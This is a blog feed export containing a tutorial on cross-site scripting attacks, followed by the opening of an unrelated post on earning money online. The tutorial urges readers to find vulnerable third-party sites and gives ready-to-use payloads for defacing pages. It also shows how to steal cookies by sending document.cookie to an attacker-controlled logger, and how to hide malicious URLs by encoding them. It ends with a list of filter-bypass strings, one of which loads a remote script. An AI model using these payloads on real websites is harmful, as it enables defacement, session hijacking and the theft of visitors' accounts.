&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;To start finding these Vulnerabilities you can start checking out Blogs, Forums, Shoutboxes, Comment Boxes, Search Box&#39;s, there are too many to mention.&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;Using &#39;Google Dorks&#39; to make the finding easyier, Ok if you wanna get cracking, goto google.com and type inurl:&quot;search.php?q=&quot; now that is a common page and has alot&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;of results. Also note that most sites have XSS Vulnerabilities, its just having a good&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;eye, and some good knowledge on how to bypass there filteration.&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;b style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;&lt;span style=&quot;font-family: georgia, serif;&quot;&gt;Basics of XSS&lt;/span&gt;:&lt;/b&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;Well now lets start learning some Actual Methods, the most common used XSS&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;injection is :&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;&amp;lt;script&amp;gt;alert(&quot;Priyanshu&quot;)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;now this will alert a popup message, saying &quot;Priyanshu&quot; without quotes.&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;So,use &quot;search.php?q=&quot; and you can simple try the following on a website with the&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;&amp;nbsp;same thing,&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;http://website.com/search.php?q=&amp;lt;script&amp;gt;alert(&quot;Priyanshu&quot;)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;There are good chances of it working, but dont be worried if it dont, just try diffrent sites. You can insert HTML not just javascript :&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;http://website.com/search.php?q=&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;b&amp;gt;&amp;lt;u&amp;gt;Priyanshu&amp;lt;/u&amp;gt;&amp;lt;/b&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;if you see the bold text on the page and newlines then you knows its vulnerable.&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;b style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;Example:&lt;/b&gt;&lt;br /&gt;
&lt;div style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px; margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;
&lt;a href=&quot;http://www.hackersonlineclub.com/cross-site-scripting-xss/XSS%20Bollywood.png?attredirects=0&quot; imageanchor=&quot;1&quot; style=&quot;background-image: none; background-position: initial initial; background-repeat: initial initial; border-bottom-style: none; color: rgb(0, 82, 20) !important;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://www.hackersonlineclub.com/_/rsrc/1299145844026/cross-site-scripting-xss/XSS%20Bollywood.png?height=223&amp;amp;width=400&quot; height=&quot;223&quot; style=&quot;border: 0px; padding: 0px;&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;hr size=&quot;2&quot; style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; width=&quot;100%&quot; /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;b style=&quot;background-color: white; font-family: georgia, serif; font-size: 13px;&quot;&gt;How to Deface a Website using XSS ?&lt;/b&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;Well now you understand how XSS works, we can explain some simple XSS deface&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;methods, there are many ways for defacing i will mention some of the best and most used,&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;the first one being IMG SCR, now for those of you who dont know html, IMG SCR&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;is a tag, that displays the IMAGE linked to it on the webpage.&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;&amp;lt;html&amp;gt;&amp;lt;body&amp;gt;&amp;lt;IMG SRC=&quot;http://website.com/yourDefaceIMAGE.png&quot;&amp;gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;ok now if you change the link to a valid picture link, and save it and run it you will see what i mean. Right now say you have found a Shoutbox, Comment box, or anything&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;that shows your data after you submitted it you could insert the following to make the picture display on the page.&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;&amp;lt;IMG SRC=&quot;http://site.com/yourDefaceIMAGE.png&quot;&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;The other tags are not needed has the page will already have them. Ok it helps to&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;make your picture big so it stands out and its clear the site got hacked. Another method is using FLASH videos, its the same has the method below but a more stylish deface.&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;&amp;lt;EMBED SRC=&quot;http://site.com/xss.swf&quot;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;That will execute the flash video linked to it. Or maybe using a pop or redirection as :&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;&amp;lt;script&amp;gt;window.open( &quot;http://www.hackersonlineclub.tk/&quot; )&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;There are many others ways that you can found using Google or other website.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;Mine purpose is to make you understand the concept :)&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;b style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;&lt;span style=&quot;font-family: georgia, serif;&quot;&gt;How to Cookie Stealing using XSS ?&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;I decided to add this has its the most usefull method of XSS. First learn how to make&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;cookie logger from here:&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;b style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;How To Make A Cookie Stealer Php script ?&lt;/b&gt;&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;ok now you have it save it has a .php file and upload to your server, remember to&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;create the file &#39;log.txt&#39; too&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;ok now your gonna want to insert this code.&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;window.location = &quot;http://yourServer.com/cookielogger.php?c=&quot;+document.cookie&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;or&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;document.location = &quot;http://yourServer.com/cookielogger.php?c=&quot;+document.cookie&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;the second one is more stealth. Watch your file now for cookies, then you can hijack there session :D&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;but now you ask what if my site has not got, this kind of attack, it only shows data once and dont store it. Well lets say we had a page search.php?q= we can use the following code to make a maliouc url from it and maybe hex, base64 encode it so people cant see the code&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;http://site.com/search.php?q=document.location = &quot;http://yourServer.com/cookielogger.php?c=&quot;+document.cookie&lt;/span&gt;&lt;br /&gt;
&lt;hr size=&quot;2&quot; style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; width=&quot;100%&quot; /&gt;
&lt;b style=&quot;background-color: white; font-family: georgia, serif; font-size: 13px;&quot;&gt;&lt;br /&gt;How to Bypass Filtration ?&lt;/b&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;Alot of sites may seem vulnerable but not executing the code, well to solve this read&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;this. Some common methods to bypass filtration is&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;&#39;)alert(&#39;xss&#39;);&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;or&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;&quot;);alert(&#39;xss&#39;);&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;that will do the same thing has &amp;lt;script&amp;gt;alert(&quot;XSS&quot;)&amp;lt;/script&amp;gt; on a vulnerable server.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;You can also try hexing or base64 encoding your data before you submit, Please note&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;&amp;nbsp;its bad practice to use alert(&quot;XSS&quot;) to test for XSS, because some sites block the&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;keyword &quot;XSS&quot; before so we using &quot;Priyanshu&quot;.&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;Some other ways to bypass filtration&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;website.com/search.php?q=&quot;&amp;gt;&amp;lt;script&amp;gt;alert(&#39;Priyanshu&#39;)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;website.com/search.php?q=&quot;&amp;gt;&amp;lt;script&amp;gt;alert(&quot;Priyanshu&quot;)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;website.com/search.php?q=&quot;&amp;gt;&amp;lt;script&amp;gt;alert(&quot;Priyanshu&quot;);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;website.com/search.php?q=&quot;&amp;gt;&amp;lt;script&amp;gt;alert(/Priyanshu&quot;);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;website.com/search.php?q=//&quot;&amp;gt;&amp;lt;script&amp;gt;alert(/Priyanshu/);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;website.com/search.php?q=xyz&amp;lt;script&amp;gt;alert(/Priyanshu/);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;website.com/search.php?q=xyz&quot;&amp;gt;&amp;lt;script&amp;gt;alert(/Priyanshu/);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;website.com/search.php?q=xyz&quot;&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(/Priyanshu/);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;website.com/search.php?q=000&quot;&amp;gt;&amp;lt;script&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(Priyanshu);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;website.com/search.php?q=000xyz&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(/Priyanshu/);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;website.com/search.php?q=--&amp;lt;script&amp;gt;&quot;&amp;gt;&amp;lt;/script&amp;gt;alert(/Priyanshu/);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;website.com/search.php?q=&quot;&amp;gt;&amp;lt;img src=&#39;javascript:alert(&#39;Priyanshu&#39;);&#39;&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;website.com/search.php?q=&quot;&amp;gt;&amp;lt;script src=&#39;http://virus.js&#39;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;hr size=&quot;2&quot; style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; width=&quot;100%&quot; /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;b style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;Advanced XSS - way to bypass magic quotes filtration&lt;/b&gt;&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;Ok now we are going to learn about some good techniqes. I have came across many&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;sites where &#39;Magic Quotes&#39; is on and therfore rendering some commands useless. Fear not, i have come up with a way using char codes (Decimals), to convert char code to Ascii. The functions to turn CharCodes (Decimals) into ASCII, you can find a complete table here&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;a href=&quot;http://www.asciitable.com/&quot; style=&quot;background-color: white; color: rgb(0, 82, 20) !important; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;http://www.asciitable.com/&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://easycalculation.com/&quot; style=&quot;background-color: white; color: rgb(0, 82, 20) !important; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;http://easycalculation.com/&lt;/a&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;This will help you write what you want, In my examples ill be writing &quot;HOC&quot; this is the following code&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;72 79 67&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;Ok now we got the Decimal value of our string, we need to know what function in javascript converts this.&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;String.fromCharCode()&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;is suitable for this kinda things, its easy to setup, im gona give it my args below.&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;String.fromCharCode(72, 79, 67)&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;Ok now &quot;String.fromCharCode(72, 79, 67)&quot; Is a JAVA (ASCII) way of saying &quot;HOC&quot;.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;And to use this with alerts etc, you dont need to use quotes, as it acts as a variable.&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;&amp;lt;script&amp;gt;alert(String.fromCharCode(72, 79, 67))&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://gouravinfo.blogspot.com/feeds/6065932301297018479/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://gouravinfo.blogspot.com/2014/01/cross-site-scripting-xss-attacks.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/6065932301297018479'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/6065932301297018479'/><link rel='alternate' type='text/html' href='http://gouravinfo.blogspot.com/2014/01/cross-site-scripting-xss-attacks.html' title='Cross-site Scripting XSS Attacks'/><author><name>Gourav Ratnawat</name><uri>http://www.blogger.com/profile/03815155318390279322</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIZoLmC65AXKrNABnNfxhzeowPYCsr93DX9SQDkIH_2SEiHQddadPoboFvNG0_zEDxj6lGmengwWk33scEp3cO0HegFS-kxERyTDTOrM2tMtgbhtE_4_a7jORklx4yVGs/s220/FB_IMG_1557336607561.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-276484908558385294.post-4277046663375536153</id><published>2013-10-25T23:56:00.002+05:30</published><updated>2013-10-25T23:56:17.587+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Online Money"/><title type='text'>Top 24 Ways to Earn Money Online</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;h2 style=&quot;background-color: white; color: #333333; font-family: Lato, arial, sans-serif; font-size: 28px; line-height: 40px; margin: 40px 0px 10px; text-rendering: optimizelegibility;&quot;&gt;
&lt;b&gt;1.&amp;nbsp;&lt;/b&gt;&lt;b&gt;Website Building&lt;/b&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
If the internet is a country, then websites are like real estates. I’m hoping by now you have a general understanding that real estates are valuable in the physical world – digital real estates work the same way. By building a website, you’re creating your own plot of online “land.”&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
You can fill this land with whatever you want, but you have to promote it through social media (and anywhere else you can think of) for this to be successful. When you build traffic to your land, you can sell people whatever you have to offer. In order to build a website, you need a host (i.e&amp;nbsp;&lt;a href=&quot;http://www.godaddy.com/&quot; style=&quot;color: #0088cc; text-decoration: none;&quot;&gt;&lt;b&gt;GoDaddy&lt;/b&gt;&lt;/a&gt;), a template (i.e&amp;nbsp;&lt;a href=&quot;http://wordpress.com/&quot; style=&quot;color: #0088cc; text-decoration: none;&quot;&gt;&lt;b&gt;WordPress&lt;/b&gt;&lt;/a&gt;), and content.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
The first two parts are easy to find, and content is only as difficult as you make it. You can post blogs, items for sale, pictures, videos, or whatever you want. Opening up your own website gives you the potential to make money from the avenues I’m going to mention.&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #333333; font-family: Lato, arial, sans-serif; font-size: 28px; line-height: 40px; margin: 40px 0px 10px; text-rendering: optimizelegibility;&quot;&gt;
&lt;b&gt;2. B2B Marketing&lt;/b&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
An online business model I love is utilized by&amp;nbsp;&lt;a href=&quot;http://getvoip.com/business&quot; style=&quot;color: #0088cc; text-decoration: none;&quot;&gt;&lt;b&gt;GetVoiP&lt;/b&gt;&lt;/a&gt;, an affiliate marketer based in New York. GetVoiP acts as an agent for business communication providers. They maintain updated listings of VoiP providers, including ratings, comparisons, consumer reviews, in-depth knowledge of market and end-user trends, and expert opinions from business professionals on a variety of topics related to business consumers. By not only keeping abreast of news, but providing detailed analysis of products being offered, GetVoiP is able to generate traffic to their site and increase their clout with businesses.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
